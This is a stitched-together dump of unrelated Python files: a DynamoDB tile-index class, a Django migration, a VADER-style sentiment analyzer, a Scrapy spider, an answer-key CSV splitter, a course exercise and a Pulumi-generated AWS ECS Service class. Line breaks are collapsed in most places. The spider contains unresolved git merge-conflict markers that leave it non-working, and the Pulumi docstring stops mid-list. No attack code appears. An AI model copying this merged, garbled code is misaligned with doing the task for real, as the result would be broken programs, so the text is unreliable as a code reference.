Temp try-catch while developing on Windows. 
# from spdb.c_lib.ndlib import XYZMorton #except Exception: # pass class BossTileIndexDB: def __init__(self, project_name, region_name=settings.REGION_NAME, endpoint_url=None): # creating the resource table_name = BossTileIndexDB.getTableName() dynamo = boto3.resource('dynamodb', region_name=region_name, endpoint_url=endpoint_url, aws_access_key_id=settings.AWS_ACCESS_KEY_ID, aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY) self.table = dynamo.Table(table_name) self.project_name = project_name @staticmethod def createTable(schema, region_name=settings.REGION_NAME, endpoint_url=None): """Create the tile index table in dynamodb. The table's name will be taken from settings.ini ([aws]tile_index_table). This method blocks until the table is created in DynamoDB. Args: schema (dict): Table's schema encoded in a dictionary. If TableName is set, it will be overwritten by the name in settings.ini. region_name (optional[string]): AWS region queue lives in. Extracted from settings.ini if not provided. endpoint_url (optional[string]): Provide if using a mock or fake Boto3 service. """ # creating the resource table_name = BossTileIndexDB.getTableName() schema['TableName'] = table_name dynamo = boto3.resource('dynamodb', region_name=region_name, endpoint_url=endpoint_url, aws_access_key_id=settings.AWS_ACCESS_KEY_ID, aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY) try: table = dynamo.create_table(**schema) except Exception as e: print (e) raise BossTileIndexDB.wait_table_create(table_name, region_name, endpoint_url) @staticmethod def wait_table_create(table_name, region_name=settings.REGION_NAME, endpoint_url=None): """Poll dynamodb at a 2s interval until the table creates.""" client = boto3.client('dynamodb', region_name=region_name, endpoint_url=endpoint_url, aws_access_key_id=settings.AWS_ACCESS_KEY_ID, aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY) cnt = 0 while True: time.sleep(2) cnt += 1 if cnt > 50: # Give up waiting. return try: resp = client.describe_table(TableName=table_name) if resp['Table']['TableStatus'] == 'ACTIVE': return except: # May get an exception if table doesn't currently exist. pass @staticmethod def deleteTable(region_name=settings.REGION_NAME, endpoint_url=None): """Delete the ingest database in dynamodb""" # creating the resource table_name = BossTileIndexDB.getTableName() dynamo = boto3.resource('dynamodb', region_name=region_name, endpoint_url=endpoint_url, aws_access_key_id=settings.AWS_ACCESS_KEY_ID, aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY) try: table = dynamo.Table(table_name) table.delete() except Exception as e: print (e) raise @staticmethod def getTableName(): return settings.DYNAMO_TILEINDEX_TABLE def createCuboidEntry(self, chunk_key, task_id): """Create the initial entry for tracking tiles uploaded for a cuboid. Call this before using markTileAsUploaded(). The chunk_key represents the encodes the collection, experiment, channel/layer, and x, y, z, t indices of a cuboid. In addition, it encodes the number of tiles that comprises the cuboid in the case where there are less tiles than the normal size of a cuboid in the z direction. Args: chunk_key (string): Key used to store the entry for the cuboid. task_id (int): Task or job id that this cuboid belongs to. """ try: response = self.table.put_item( Item = { 'chunk_key': chunk_key, 'tile_uploaded_map': {}, 'task_id': task_id }) except botocore.exceptions.ClientError as e: print (e) raise def markTileAsUploaded(self, chunk_key, tile_key): """Mark the tile as uploaded. 
Marks the tile belonging to the cuboid specified by the channel name, resolution, and coordinates as uploaded. createCuboidEntry() must be called with the given chunk_key before tiles may be marked as uploaded. Args: chunk_key (string): Key used to store the entry for the cuboid. tile_key (string): Key to retrieve tile from S3 bucket. Returns: (dict): Map of uploaded tiles. """ try: response = self.table.update_item( Key = { 'chunk_key': chunk_key }, #UpdateExpression = 'ADD tile_uploaded_map.{} :uploaded'.format(tile_key), #ExpressionAttributeValues = { # ':uploaded': 1 #}, UpdateExpression = 'ADD #tilemap.#tilekey :uploaded', ExpressionAttributeNames = { '#tilemap': 'tile_uploaded_map', '#tilekey': tile_key }, ExpressionAttributeValues = { ':uploaded': 1 }, ReturnValues = 'ALL_NEW' ) return self.cuboidReady(chunk_key, response['Attributes']['tile_uploaded_map']) except botocore.exceptions.ClientError as e: print (e) raise def cuboidReady(self, chunk_key, tile_uploaded_map): """Verify if we have all tiles for a given cuboid. Args: chunk_key (string): Key used to store the entry for the cuboid. tile_uploaded_map (dict): Dictionary with tile keys as the keys. Presence of a tile indicates it's been uploaded. Returns: (bool) """ key_parts = BossUtil.decode_chunk_key(chunk_key) num_tiles = key_parts['num_tiles'] if num_tiles < settings.SUPER_CUBOID_SIZE[2]: return len(tile_uploaded_map) >= num_tiles return len(tile_uploaded_map) >= settings.SUPER_CUBOID_SIZE[2] def getCuboid(self, chunk_key): """Get the cuboid entry from the DynamoDB table. Args: chunk_key (string): Key used to store the entry for the cuboid. Returns: (dict|None): Keys include 'tile_uploaded_map' and 'chunk_key'. """ try: response = self.table.get_item( Key = { 'chunk_key' : chunk_key }, ConsistentRead = True, ReturnConsumedCapacity = 'INDEXES' ) # TODO write a yield function to pop one item at a time return response['Item'] if 'Item' in response else None except Exception as e: print (e) raise def getTaskItems(self, task_id): """Get all the cuboid entries for a given task from the table. Args: task_id (int): Id of upload task/job. Returns: (generator): Dictionary with keys: 'chunk_key', 'task_id', 'tile_uploaded_map'. """ try: response = self.table.query( IndexName = 'task_index', KeyConditionExpression = 'task_id = :task_id', ExpressionAttributeValues = { ':task_id' : task_id } ) for item in response['Items']: yield item except Exception as e: print (e) raise def deleteCuboid(self, chunk_key): """Delete cuboid from database. 
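Args:
    chunk_key (string): Key used to store the entry for the cuboid.

Returns:
    (dict): Response returned by DynamoDB's delete_item call.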
""" try: response = self.table.delete_item( Key = { 'chunk_key' : chunk_key } ) return response except botocore.exceptions.ClientError as e: print (e) raise # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('editorial', '0026_auto_20171012_1606'), ] operations = [ migrations.AlterField( model_name='task', name='completion_date', field=models.DateTimeField(help_text=b'Date and time task status is changed to complete.', auto_now_add=True, null=True), ), migrations.AlterField( model_name='task', name='inprogress_date', field=models.DateTimeField(help_text=b'Date and time task status is changed to in progress.', null=True, blank=True), ), ] ## ## A sense based sentiment analyzer ## ## ## borrows a lot from Vader ## import sys import math import yaml from importlib.resources import open_text #import sensitive.wsd from sensitive.wsd import pos2wn, disambiguate import wn from wn.morphy import Morphy en = wn.Wordnet('omw-en:1.4') morphy = Morphy(wn) ### ### Changes to the scores based on ### * punctuation DONE ### * capitalization DONE ### * intensification ### * negation ### * conjunctions (contrastive) ### * comparatives, superlatives # DONE, FIXME INCREMENTS ### * morphology based antonyms (hard) ### ### ### Constants ### # (empirically derived mean sentiment intensity rating increase for booster words) B_INCR = 0.293 B_DECR = -0.293 # (empirically derived mean sentiment intensity rating increase for booster words) COMP_INCR = 0.1 SUPR_INCR = 0.2 # (empirically derived mean sentiment intensity rating increase for using ALLCAPs to emphasize a word) C_INCR = 0.733 N_SCALAR = -0.74 ### highlighters ### have a score for before and after ### e.g. (but, 0.5, 1.5) #VADER, SOCAL 1, 2 ### (although, 1.0, 0.5) #SOCAL # yet # nevertheless # nonetheless # even so # however # still # notwithstanding # despite that # in spite of that # for all that # all the same # just the same # at the same time # be that as it may # though # although # still and all negators = {'i18282', 'i18284', 'i18436', #no 'i2944', # neither 'i18262', 'i18263', # never 'i12559', 'i18285', # none 'i18280', # not 'i18281', # nothing ## NOT 'i109082', 'i18289', # nowhere # FCB does this help? 
'i18348', # rarely, seldom } # missing contracted auxiliaries and without, nope, uh-uh, uhuh, nor neg_dict = dict.fromkeys(negators, "-0.74") boosters = {'i18320', #very 'i18185', 'i18187', 'i18188', 'i18194', 'i18197', 'i18198', 'i18199', 'i18202', 'i18207', 'i18225', 'i18249', 'i18250', 'i18251', 'i18252', 'i18259', 'i18260', 'i18270', 'i18287', 'i18320', 'i18321', 'i18324', 'i18325', 'i18344', 'i18345', 'i18356', 'i18357', 'i18359', 'i18361', 'i18368', 'i18370', 'i18390', 'i18410', 'i18413', 'i18414', 'i18424', 'i18465', 'i18466', 'i18474', 'i18475', 'i18480', 'i18481', 'i18493', 'i18494', 'i18495', 'i18533', 'i18578', 'i18629', 'i18648', 'i18654', 'i18656', 'i18689', 'i18690', 'i18691', 'i18748', 'i18760', 'i18762', 'i18776', 'i18815', 'i18846', 'i18849', 'i18888', 'i18889', 'i18890', 'i18894', 'i18907', 'i18911', 'i19062', 'i19066', 'i19112', 'i19124', 'i19125', 'i19126', 'i19127', 'i19128', 'i19129', 'i19142', 'i19207', 'i19322', 'i19332', 'i19334', 'i19335', 'i19351', 'i19359', 'i19362', 'i19363', 'i19364', 'i19386', 'i19401', 'i19433', 'i19453', 'i19476', 'i19486', 'i19495', 'i19535', 'i19587', 'i19588', 'i19612', 'i19619', 'i19671', 'i19683', 'i19685', 'i19688', 'i19689', 'i19690', 'i19692', 'i19827', 'i19843', 'i19856', 'i19857', 'i20139', 'i20140', 'i20206', 'i20266', 'i20267', 'i20268', 'i20361', 'i20362', 'i20446', 'i20602', 'i20603', 'i20604', 'i20605', 'i20659', 'i20673', 'i20733', 'i20740', 'i20795', 'i20807', 'i20968', 'i21036', 'i21086', 'i21281', 'i21647', 'i21657', 'i21666', 'i21667', 'i21670', 'i21714', 'i21720', 'i18163', 'i18581', #barely 'i78', 'i1206', 'i1265', 'i1845', 'i2472', 'i3300', 'i3912', 'i4698', 'i4840', 'i4955', 'i5422', 'i5850', 'i6188', 'i6595', 'i6635', 'i6653', 'i6989', 'i6991', 'i7021', 'i7579', 'i7599', 'i7722', 'i7819', 'i7963', 'i7964', 'i8033', 'i8056', 'i8058', 'i8060', 'i8062', 'i8064', 'i8067', 'i8068', 'i8071', 'i8208', 'i8218', 'i8284', 'i8287', 'i8410', 'i8418', 'i8524', 'i8526', 'i8527', 'i8531', 'i8534', 'i8535', 'i8536', 'i8537', 'i8540', 'i8541', 'i8542', 'i8544', 'i9030', 'i9195', 'i9442', 'i10123', 'i10228', 'i10278', 'i10380', 'i10381', 'i10676', 'i10739', 'i11517', 'i11891', 'i11893', 'i12239', 'i12344', 'i12553', 'i12941', 'i12963', 'i13000', 'i13214', 'i13296', 'i14223', 'i18163', 'i18165', 'i18177', 'i18181', 'i18187', 'i18193', 'i18195', 'i18198', 'i18208', 'i18209', 'i18210', 'i18248', 'i18250', 'i18264', 'i18302', 'i18332', 'i18333', 'i18350', 'i18352', 'i18477', 'i18578', 'i18581', 'i18582', 'i18694', 'i18757', 'i18760', 'i18761', 'i18762', 'i18763', 'i18764', 'i18812', 'i18873', 'i19191', 'i19229', 'i19623', 'i19691', 'i19749', 'i20135', 'i20838', 'i20839', 'i21309', 'i21658', 'i21674' } boost_dict = dict.fromkeys(boosters, "0.293") #@staticmethod def increment(valence, increment): """ increment in the same direction as the valence """ if valence == 0.0: return valence elif valence > 0: return valence + increment else: # valence < 0 return valence - increment #@staticmethod def stretch(valence, increment): """ stretch the valence """ return valence * increment def normalize(score, alpha=15): """ Normalize the score to be between -1 and 1 using an alpha that approximates the max expected value """ norm_score = score / math.sqrt((score * score) + alpha) if norm_score < -1.0: return -1.0 elif norm_score > 1.0: return 1.0 else: return norm_score def allcap_differential(words): """ Check whether just some words in the input are ALL CAPS :param list words: The words to inspect :returns: `True` if some but not all items in `words` 
are ALL CAPS """ is_different = False allcap_words = 0 for word in words: if word.isupper(): allcap_words += 1 cap_differential = len(words) - allcap_words if 0 < cap_differential < len(words): is_different = True return is_different def _sift_sentiment_scores(sentiments): # want separate positive versus negative sentiment scores pos_sum = 0.0 neg_sum = 0.0 neu_count = 0 for sentiment_score in sentiments: if sentiment_score > 0: pos_sum += (float(sentiment_score) + 1) # compensates for neutral words that are counted as 1 elif sentiment_score < 0: neg_sum += (float(sentiment_score) - 1) # when used with math.fabs(), compensates for neutrals else: # sentiment_score == 0: neu_count += 1 return pos_sum, neg_sum, neu_count def score_valence(sentiments, punct_emph_amplifier): if sentiments: sum_s = float(sum(sentiments)) # compute and add emphasis from punctuation in text sum_s = increment(sum_s, punct_emph_amplifier) compound = normalize(sum_s) # discriminate between positive, negative and neutral sentiment scores pos_sum, neg_sum, neu_count = _sift_sentiment_scores(sentiments) if pos_sum > math.fabs(neg_sum): pos_sum += punct_emph_amplifier elif pos_sum < math.fabs(neg_sum): neg_sum -= punct_emph_amplifier total = pos_sum + math.fabs(neg_sum) + neu_count pos = math.fabs(pos_sum / total) neg = math.fabs(neg_sum / total) neu = math.fabs(neu_count / total) else: compound = 0.0 pos = 0.0 neg = 0.0 neu = 0.0 sentiment_dict = \ {"neg": round(neg, 3), "neu": round(neu, 3), "pos": round(pos, 3), "compound": round(compound, 4)} return sentiment_dict def _amplify_ep(text): """ check for added emphasis resulting from exclamation points (up to 4 of them) """ ep_count = text.count("!") if ep_count > 4: ep_count = 4 # (empirically derived mean sentiment intensity rating increase for # exclamation points) ep_amplifier = ep_count * 0.292 return ep_amplifier def _amplify_qm(text): """ check for added emphasis resulting from question marks (2 or 3+) """ qm_count = text.count("?") qm_amplifier = 0 if qm_count > 1: if qm_count <= 3: # (empirically derived mean sentiment intensity rating increase for # question marks) qm_amplifier = qm_count * 0.18 else: qm_amplifier = 0.96 return qm_amplifier def punctuation_emphasis(text): # add emphasis from exclamation points and question marks ep_amplifier = _amplify_ep(text) qm_amplifier = _amplify_qm(text) punct_emph_amplifier = ep_amplifier + qm_amplifier return punct_emph_amplifier class SentimentAnalyzer(object): """ Give a sentiment intensity score to sentences. 
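Scores are sense-based: the input is disambiguated against an English wordnet ('omw-en') before the valence lexicon is applied. Typical use (a sketch; the example sentence is only illustrative):

    analyzer = SentimentAnalyzer()
    scores = analyzer.polarity_scores("VADER is smart, handsome, and funny.")
    # scores holds 'neg', 'neu', 'pos' and 'compound' entries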
""" def __init__(self, model="en_sense"): modpath = f"{__package__}.models.{model}" datapath = f"{__package__}.data" self.meta = self.read_meta(modpath, 'meta.yaml') ### Valence lexicons self.lexicon = dict() for lexfile in self.meta['lexicons']: self.lexicon.update(self.make_lex_dict(modpath, lexfile)) print(f"loaded model {model}") ### def read_meta(self, modpath, meta_file): """ Read meta parameters for the model """ with open_text(modpath, meta_file) as metafh: meta = yaml.safe_load(metafh) return meta def make_lex_dict(self, modpath, lexicon_file): """ Convert lexicon file to a dictionary Expect a tab separated lexicon lemma score rest Allow comments with hashes """ lex_dict = {} fh = open_text(modpath, lexicon_file) for line in fh: line = line.strip() if not line or line.startswith('#'): continue (word, measure) = line.strip().split('\t')[0:2] lex_dict[word] = float(measure) return lex_dict def lexical_valence(self, w, p, l, t): """ find the lexical valence apply any morphological changes """ if t in self.lexicon: valence = self.lexicon[t] if valence: if p == 'JJR': # comparative valence = increment(valence, COMP_INCR) elif p == 'JJS': # superlative valence = increment(valence, SUPR_INCR) return valence def sentiment_valence(self, i, senses, is_cap_diff): valence = 0.0 (w, p, l, t) = senses[i] ### get the base valence, with morphological changes if t in self.lexicon: valence = self.lexical_valence(w, p, l, t) ### CAPITALIZATION if valence and is_cap_diff and \ w.isupper() and not l.isupper(): valence = increment(valence, C_INCR) return valence def polarity_scores(self, text): """ Return a float for sentiment strength based on the input text. Positive values are positive valence, negative value are negative valence. """ senses = disambiguate(text, en, morphy) print(senses) is_cap_diff = allcap_differential([w for (w, p, l, t) in senses]) ### pad with beginners? 
sentiments = list() for i, (w, p, l, t) in enumerate(senses): #position, word, pos, lemma, i-tag local = self.sentiment_valence(i, senses, is_cap_diff) if i > 1 and (senses[i-1] in boost_dict): #add -B_INCR to boosters itself local = increment(local, B_INCR) if i > 2 and (senses[i-2] in boost_dict): local = increment(local, B_INCR*0.95) if i > 3 and (senses[i-3] in boost_dict): local = increment(local, B_INCR*0.9) if i > 1 and (senses[i-1] in neg_dict): local = stretch(local,N_SCALAR) if i > 2 and (senses[i-2] in neg_dict): local = stretch(local,N_SCALAR) if i > 3 and (senses[i-3] in neg_dict): local = stretch(local,N_SCALAR) sentiments.append(local) punct_score = punctuation_emphasis(text) valence_dict = score_valence(sentiments, punct_score) print(sentiments) return valence_dict # if __name__ == '__main__': # sentences = ["VADER is smart, handsome, and funny.", # "We have some problems."] # analyzer = SentimentAnalyzer() 1695652161/Spider_Armiesquotes.toscrape.com/tutorial/tutorial/spiders/quotes.py from typing import Counter import scrapy from tutorial.items import QuoteItem from scrapy.http.request import Request class QuotesSpider(scrapy.Spider): # 爬虫名称, 唯一的 name = 'quotes' # 请求url非该域名则过滤 # allowed_domains = ['quotes.toscrape.com'] # is_open_count = True # count = 0 # MAX = 5 custom_settings = { <<<<<<< HEAD "CONCURRENT_REQUESTS": 6, "DOWNLOAD_DELAY": 0, 'tutorial.middlewares.TutorialDownloaderMiddleware': 543, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'tutorial.middlewares.TutorialRetryMiddleware': 550, } start_urls = [ 'http://httpbin.org/ip', 'http://httpbin.org/ip', 'http://httpbin.org/ip', 'http://httpbin.org/ip', 'http://httpbin.org/ip', 'http://httpbin.org/ip', ] # start_urls = [ # # 'http://quotes.toscrape.com/page/1/', # # 'http://quotes.toscrape.com/page/2/', # # 'http://quotes.toscrape.com/page/3/', # # 'http://quotes.toscrape.com/page/4/', # # 'http://quotes.toscrape.com/page/5/', # # 'http://quotes.toscrape.com/page/6/', # # 'http://quotes.toscrape.com/page/7/', # # 'http://quotes.toscrape.com/page/8/', # # 'http://quotes.toscrape.com/page/9/', # # 'http://quotes.toscrape.com/page/10/', # # 'http://quotes.toscrape.com/page/11/', # # 'http://quotes.toscrape.com/page/12/', # # 'http://quotes.toscrape.com/page/13/', # # 'http://quotes.toscrape.com/page/14/', # # 'http://quotes.toscrape.com/page/15/', # # 'http://quotes.toscrape.com/page/16/', # # 'http://quotes.toscrape.com/page/17/', # # 'https://www.correos.cl/', # # 'https://www.correos.cl/', # # 'https://www.correos.cl/', ======= "CONCURRENT_REQUESTS": 4, "DOWNLOAD_DELAY":0.5, } start_urls = [ 'http://httpbin.org/ip#1/', 'http://httpbin.org/ip#2/', 'http://httpbin.org/ip#3/', 'http://httpbin.org/ip#4/', 'http://httpbin.org/ip#5/', 'http://httpbin.org/ip#6/', 'http://httpbin.org/ip#7/', 'http://httpbin.org/ip#8/', 'http://httpbin.org/ip#9/', 'http://httpbin.org/ip#10/', 'http://httpbin.org/ip#11/', 'http://httpbin.org/ip#12/', 'http://httpbin.org/ip#13/', 'http://httpbin.org/ip#14/', 'http://httpbin.org/ip#15/', 'http://httpbin.org/ip#16/', 'http://httpbin.org/ip#17/', 'http://httpbin.org/ip#17/', 'http://httpbin.org/ip#18/', 'http://httpbin.org/ip#19/', 'http://httpbin.org/ip#20/', 'http://httpbin.org/ip#21/', ] # start_urls = [ # 'http://quotes.toscrape.com/page/1/', # 'http://quotes.toscrape.com/page/2/', # 'http://quotes.toscrape.com/page/3/', # 'http://quotes.toscrape.com/page/4/', # 'http://quotes.toscrape.com/page/5/', # 'http://quotes.toscrape.com/page/6/', # 'http://quotes.toscrape.com/page/7/', 
import csv
import json
from pathlib import Path

# This script creates the site-specific answer-key CSVs out of the overall answer_key JSON.
# It iterates over the JSON and breaks people out based on which site they belong to.
# The columns of the CSV are just the 4 fields from the objects in the JSON.
# Note that nothing actually uses file_name, so it could be stripped to reduce file size if necessary.

answer_key = Path("../temp-data/answer_key.json")
sites = ['a', 'b', 'c', 'd', 'e', 'f']

site_ids = {}
for site in sites:
    site_ids[site] = set()
    pii_file = Path(f"../temp-data/pii_site_{site}.csv")
    with open(pii_file) as pii_csv:
        pii_reader = csv.reader(pii_csv)
        # Skip the header row
        next(pii_reader)
        for row in pii_reader:
            site_ids[site].add(row[0])

HEADER = ["record_id", "seed_record_id", "household_id", "file_name"]

new_answer_key = []
with open(answer_key) as f:
    d = json.load(f)
    # Example of the expected structure:
    # {
    #     "14444032-081e-92ac-47dd-eafdbce66365": [
    #         {
    #             "record_id": "19029",
    #             "seed_record_id": "19028",
    #             "household_id": "3879064",
    #             "file_name": "Andrew_Nikla_Denbraber_14444032-081e-92ac-47dd-eafdbce663652.json"
    #         },
    #         {
    #             "record_id": "19030",
    #             "seed_record_id": "19028",
    #             "household_id": "3879064",
    #             "file_name": "Dr_Andrew_Denbraber_14444032-081e-92ac-47dd-eafdbce663650.json"
    #         },
    #         {
    #             "record_id": "19029",
    #             "seed_record_id": "19028",
    #             "household_id": "3879064",
    #             "file_name": "Andrew_Nikla_Denbraber_14444032-081e-92ac-47dd-eafdbce663651.json"
    #         }
    #     ],
    for household in d.values():
        for record in household:
            record_id = record['record_id']
            seed_record_id = record['seed_record_id']
            household_id = record['household_id']
            file_name = record['file_name']
            key_line = [record_id, seed_record_id, household_id, file_name]
            new_answer_key.append(key_line)

for site in sites:
    csv_out_path = Path(f"../temp-data/site_{site}_key.csv")
    with open(csv_out_path, "w", newline="", encoding="utf-8") as answer_key_csv:
        writer = csv.writer(answer_key_csv)
        writer.writerow(HEADER)
        for output_row in new_answer_key:
            if output_row[0] in site_ids[site]:
                writer.writerow(output_row)

fabiosabariego/curso-python0
"""
Create a package called utilidadesCeV with two internal modules, moeda and dado.
Move the functions used in ex110 into the first one and keep everything working.
"""
from ex111.utilidadesCeV import moeda

p = float(input('Digite o Preço: R$'))
moeda.resumo(p, 80, 35)
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***

import warnings

import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union

from .. import _utilities, _tables
from . 
import outputs from ._inputs import * __all__ = ['Service'] class Service(pulumi.CustomResource): def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, capacity_provider_strategies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceCapacityProviderStrategyArgs']]]]] = None, cluster: Optional[pulumi.Input[str]] = None, deployment_controller: Optional[pulumi.Input[pulumi.InputType['ServiceDeploymentControllerArgs']]] = None, deployment_maximum_percent: Optional[pulumi.Input[int]] = None, deployment_minimum_healthy_percent: Optional[pulumi.Input[int]] = None, desired_count: Optional[pulumi.Input[int]] = None, enable_ecs_managed_tags: Optional[pulumi.Input[bool]] = None, enable_execute_command: Optional[pulumi.Input[bool]] = None, force_new_deployment: Optional[pulumi.Input[bool]] = None, health_check_grace_period_seconds: Optional[pulumi.Input[int]] = None, iam_role: Optional[pulumi.Input[str]] = None, launch_type: Optional[pulumi.Input[str]] = None, load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceLoadBalancerArgs']]]]] = None, name: Optional[pulumi.Input[str]] = None, network_configuration: Optional[pulumi.Input[pulumi.InputType['ServiceNetworkConfigurationArgs']]] = None, ordered_placement_strategies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceOrderedPlacementStrategyArgs']]]]] = None, placement_constraints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePlacementConstraintArgs']]]]] = None, platform_version: Optional[pulumi.Input[str]] = None, propagate_tags: Optional[pulumi.Input[str]] = None, scheduling_strategy: Optional[pulumi.Input[str]] = None, service_registries: Optional[pulumi.Input[pulumi.InputType['ServiceServiceRegistriesArgs']]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, task_definition: Optional[pulumi.Input[str]] = None, wait_for_steady_state: Optional[pulumi.Input[bool]] = None, __props__=None, __name__=None, __opts__=None): """ > **Note:** To prevent a race condition during service deletion, make sure to set `depends_on` to the related `iam.RolePolicy`; otherwise, the policy may be destroyed too soon and the ECS service will then get stuck in the `DRAINING` state. Provides an ECS service - effectively a task that is expected to run until an error occurs or a user terminates it (typically a webserver or a database). See [ECS Services section in AWS developer guide](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html). 
## Example Usage ```python import pulumi import pulumi_aws as aws mongo = aws.ecs.Service("mongo", cluster=aws_ecs_cluster["foo"]["id"], task_definition=aws_ecs_task_definition["mongo"]["arn"], desired_count=3, iam_role=aws_iam_role["foo"]["arn"], ordered_placement_strategies=[aws.ecs.ServiceOrderedPlacementStrategyArgs( type="binpack", field="cpu", )], load_balancers=[aws.ecs.ServiceLoadBalancerArgs( target_group_arn=aws_lb_target_group["foo"]["arn"], container_name="mongo", container_port=8080, )], placement_constraints=[aws.ecs.ServicePlacementConstraintArgs( type="memberOf", expression="attribute:ecs.availability-zone in [us-west-2a, us-west-2b]", )], opts=pulumi.ResourceOptions(depends_on=[aws_iam_role_policy["foo"]])) ``` ### Ignoring Changes to Desired Count You can use [`ignoreChanges`](https://www.pulumi.com/docs/intro/concepts/programming-model/#ignorechanges) to create an ECS service with an initial count of running instances, then ignore any changes to that count caused externally (e.g. Application Autoscaling). ```python import pulumi import pulumi_aws as aws # ... other configurations ... example = aws.ecs.Service("example", desired_count=2) ``` ### Daemon Scheduling Strategy ```python import pulumi import pulumi_aws as aws bar = aws.ecs.Service("bar", cluster=aws_ecs_cluster["foo"]["id"], task_definition=aws_ecs_task_definition["bar"]["arn"], scheduling_strategy="DAEMON") ``` ### External Deployment Controller ```python import pulumi import pulumi_aws as aws example = aws.ecs.Service("example", cluster=aws_ecs_cluster["example"]["id"], deployment_controller=aws.ecs.ServiceDeploymentControllerArgs( type="EXTERNAL", )) ``` ## Import ECS services can be imported using the `name` together with ecs cluster `name`, e.g. ```sh $ pulumi import aws:ecs/service:Service imported cluster-name/service-name ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceCapacityProviderStrategyArgs']]]] capacity_provider_strategies: The capacity provider strategy to use for the service. Can be one or more. Defined below. :param pulumi.Input[str] cluster: ARN of an ECS cluster :param pulumi.Input[pulumi.InputType['ServiceDeploymentControllerArgs']] deployment_controller: Configuration block containing deployment controller configuration. Defined below. :param pulumi.Input[int] deployment_maximum_percent: The upper limit (as a percentage of the service's desiredCount) of the number of running tasks that can be running in a service during a deployment. Not valid when using the `DAEMON` scheduling strategy. :param pulumi.Input[int] deployment_minimum_healthy_percent: The lower limit (as a percentage of the service's desiredCount) of the number of running tasks that must remain running and healthy in a service during a deployment. :param pulumi.Input[int] desired_count: The number of instances of the task definition to place and keep running. Defaults to 0. Do not specify if using the `DAEMON` scheduling strategy. :param pulumi.Input[bool] enable_ecs_managed_tags: Specifies whether to enable Amazon ECS managed tags for the tasks within the service. :param pulumi.Input[bool] enable_execute_command: Specifies whether to enable Amazon ECS Exec for the tasks within the service. :param pulumi.Input[bool] force_new_deployment: Enable to force a new task deployment of the service. This can be used to update tasks to use a newer Docker image with same image/tag combination (e.g. 
`myimage:latest`), roll Fargate tasks onto a newer platform version, or immediately deploy `ordered_placement_strategy` and `placement_constraints` updates. :param pulumi.Input[int] health_check_grace_period_seconds: Seconds to ignore failing load balancer health checks on newly instantiated tasks to prevent premature shutdown, up to 2147483647. Only valid for services configured to use load balancers. :param pulumi.Input[str] iam_role: ARN of the IAM role that allows Amazon ECS to make calls to your load balancer on your behalf. This parameter is required if you are using a load balancer with your service, but only if your task definition does not use the `awsvpc` network mode. If using `awsvpc` network mode, do not specify this role. If your account has already created the Amazon ECS service-linked role, that role is used by default for your service unless you specify a role here. :param pulumi.Input[str] launch_type: The launch type on which to run your service. The valid values are `EC2` and `FARGATE`. Defaults to `EC2`. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceLoadBalancerArgs']]]] load_balancers: A load balancer block. Load balancers documented below. :param pulumi.Input[str] name: The name of the service (up to 255 letters, numbers, hyphens, and underscores) :param pulumi.Input[pulumi.InputType['ServiceNetworkConfigurationArgs']] network_configuration: The network configuration for the service. This parameter is required for task definitions that use the `awsvpc` network mode to receive their own Elastic Network Interface, and it is not supported for other network modes. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceOrderedPlacementStrategyArgs']]]] ordered_placement_strategies: Service level strategy rules that are taken into consideration during task placement. List from top to bottom in order of precedence. Updates to this configuration will take effect next task deployment unless `force_new_deployment` is enabled. The maximum number of `ordered_placement_strategy` blocks is `5`. Defined below. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePlacementConstraintArgs']]]] placement_constraints: rules that are taken into consideration during task placement. Updates to this configuration will take effect next task deployment unless `force_new_deployment` is enabled. Maximum number of `placement_constraints` is `10`. Defined below. :param pulumi.Input[str] platform_version: The platform version on which to run your service. Only applicable for `launch_type` set to `FARGATE`. Defaults to `LATEST`. More information about Fargate platform versions can be found in the [AWS ECS User Guide](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/platform_versions.html). :param pulumi.Input[str] propagate_tags: Specifies whether to propagate the tags from the task definition or the service to the tasks. The valid values are `SERVICE` and `TASK_DEFINITION`. :param pulumi.Input[str] scheduling_strategy: The scheduling strategy to use for the service. The valid values are `REPLICA` and `DAEMON`. Defaults to `REPLICA`. Note that [*Tasks using the Fargate launch type or the `CODE_DEPLOY` or `EXTERNAL` deployment controller types don't support the `DAEMON` scheduling strategy*](https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_CreateService.html). :param pulumi.Input[pulumi.InputType['ServiceServiceRegistriesArgs']] service_registries: The service discovery registries for the service. 
